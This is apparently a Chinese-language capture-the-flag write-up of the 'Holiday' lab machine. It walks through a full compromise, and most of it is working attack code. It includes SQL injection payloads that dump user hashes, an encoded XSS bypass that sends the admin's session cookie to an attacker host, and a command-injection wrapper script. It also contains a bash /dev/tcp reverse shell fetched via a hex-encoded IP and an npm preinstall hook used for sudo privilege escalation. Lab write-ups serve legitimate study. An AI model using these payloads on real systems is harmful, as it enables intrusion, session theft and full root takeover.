[Meachines] [Hard] Holiday SQLI+XSS-Bypass+RCE-HEX-Shell+TRP00F+npm特權升級

Мартин.2025-05-05 8:01

Information Gathering

IP Address Opening Ports
10.10.10.25 TCP:22,8000

$ ip='10.10.10.25'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

bash 复制代码 
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c3aa3dbd0e0146c96b4673f3d1bacef2 (RSA)
|   256 b567f5eb8d11e90fddf452259fb12f23 (ECDSA)
|_  256 79e97896c5a8f4028390583fe58dfa98 (ED25519)
8000/tcp open  http    Node.js Express framework
|_http-title: Error
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

SQLI

http://10.10.10.25:8000/

$ dirsearch -u 'http://10.10.10.25:8000/'

http://10.10.10.25:8000/login

复制代码 
POST /login HTTP/1.1
Host: 10.10.10.25:8000
Content-Length: 24
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.10.25:8000
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.10.25:8000/login
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

username=1x&password=1

username=x"--+&password=1

Error Occurred
username=x"))--+&password=1

Invalid User
username=x")) OR 1=1 --+&password=1

Incorrect Password
username=1")) ORDER BY 4 --+&password=1

字段為4

確認回顯位置

username=1")) UNION SELECT 88,99,66,67 --+&password=1

確認數據庫類型

username=1")) UNION SELECT 88,sqlite_version(),66,67 --+&password=1

Sqlite 3.15.0
username=1")) UNION SELECT 88,group_concat(name, ','),66,67 FROM sqlite_master WHERE type='table' --+&password=1

users,sqlite_sequence,notes,bookings,sessions

$ sqlmap -r /tmp/sql -T users,notes,sessions --dump --threads 10

复制代码 
+----+--------+----------------------------------+----------+
| id | active | password                         | username |
+----+--------+----------------------------------+----------+
| 1  | 1      | fdc8cd4cff2c19e0d1022e78481ddf36 | RickA    |
+----+--------+----------------------------------+----------+

nevergonnagiveyouup

http://10.10.10.25:8000/agent

XSS Bypass

http://10.10.10.25:8000/vac/8dd841ff-3f44-4f2b-9324-9a833e2c6b65

所有備註都必須經過管理員審核 --- 此過程最多可能需要 1 分鐘。

js 复制代码 
<img src='http://10.10.16.13:8090/SUCCESSFULLY' />
sh 复制代码 
$ url="http://10.10.16.13:10000/1.js"
js="document.write('<script src=\"$url\"></script>');"
echo -n "$js" | od -An -t u1 | tr -d '\n' | sed 's| \+|,|g; s|^,||; s|^|<img src="/><script>eval(String.fromCharCode(|; s|$|))</script>"/>|'
JS 复制代码 
window.addEventListener('DOMContentLoaded', function(e) {
    window.location = "http://10.10.16.13:10000/?cookie=" + encodeURI(document.getElementsByName("cookie")[0].value)
})
复制代码 
connect.sid=s%3a98a88d30-27f1-11f0-ade9-71050c9a43af.4gmaIMgfX/Hym%2bqFylhAqwyx1QklsHSDYZlccAj0iF0

RCE && HEX Reverse Shell

http://10.10.10.25:8000/admin

http://10.10.10.25:8000/admin/export?table=.../

這似乎在在防止命令執行[a-z0-9&\s\/]

SH 复制代码 
#!/bin/bash

 
urlencode() {
  python3 -c "import sys, urllib.parse; print(urllib.parse.quote(sys.argv[1]))" "$1"
}
while true; do
  echo -n "SHELL$ "
  read cmd
  if [[ "$cmd" == "exit" ]]; then
    break
  fi
  encoded_cmd=$(urlencode "$cmd")
  url="http://10.10.10.25:8000/admin/export?table=x%26${encoded_cmd}"
  curl "$url" \
    --cookie "connect.sid=s%3a98a88d30-27f1-11f0-ade9-71050c9a43af.4gmaIMgfX/Hym%2bqFylhAqwyx1QklsHSDYZlccAj0iF0" \
    -H 'Cache-Control: max-age=0' \
    -H 'Upgrade-Insecure-Requests: 1' \
    -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36' \
    -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' \
    -H 'Accept-Encoding: gzip, deflate' \
    -H 'Accept-Language: en-US,en;q=0.9' \
    --http1.1
done

$ ./exp.sh

sh 复制代码 
#!/bin/bash

bash -i >& /dev/tcp/10.10.16.13/443 0>&1

將IP轉爲十六進制

$ printf '0x%02X%02X%02X%02X\n' $(echo 10.10.16.13 | tr '.' ' ') | tr 'A-F' 'a-f'

shell$ wget 0x0a0a100d/shell

SHELL$ bash shell

User.txt

79081c45597fb44319152df89b15934e

TRP00F

https://github.com/MartinxMax/trp00f

Privilege Escalation:npm

algernon@holiday:~$ sudo -l

創建/get/package.json

json 复制代码 
{
  "name": "shell",
  "version": "1.0.0",
  "scripts": {
    "preinstall": "/bin/bash"
  }
}

algernon@holiday:~$ sudo npm i ./get/ --unsafe

Root.txt

0bfed7171c81458d5d24175642c8c0b2

相关推荐
慧一居士21 分钟前
flex 布局完整功能介绍和示例演示
前端
DoraBigHead23 分钟前
小哆啦解题记——两数失踪事件
前端·算法·面试
一斤代码6 小时前
vue3 下载图片(标签内容可转图)
前端·javascript·vue
中微子6 小时前
React Router 源码深度剖析解决面试中的深层次问题
前端·react.js
光影少年6 小时前
从前端转go开发的学习路线
前端·学习·golang
中微子6 小时前
React Router 面试指南:从基础到实战
前端·react.js·前端框架
GuokLiu6 小时前
250708-Svelte项目从Debian迁移到无法联网的RHEL全流程指南
npm·svelte
3Katrina6 小时前
深入理解 useLayoutEffect:解决 UI "闪烁"问题的利器
前端·javascript·面试
前端_学习之路7 小时前
React--Fiber 架构
前端·react.js·架构
伍哥的传说8 小时前
React 实现五子棋人机对战小游戏
前端·javascript·react.js·前端框架·node.js·ecmascript·js
热门推荐
01【无标题】02集群聊天服务器---MySQL数据库的建立03Coze扣子平台完整体验和实践(附国内和国际版对比)04深度神经网络训练过程与常见概念05KGG转MP3工具|非KGM文件|解密音频06扣子(coze)实战|我用扣子搭建了一个自动分析小红薯笔记内容的AI应用|详细步骤拆解07Java类变量(静态变量)08使用Ruby接入实时行情API教程09DeepSeek各版本说明与优缺点分析10绿色建筑新态势:楼宇自控助力能效提升,推动成本优化新路径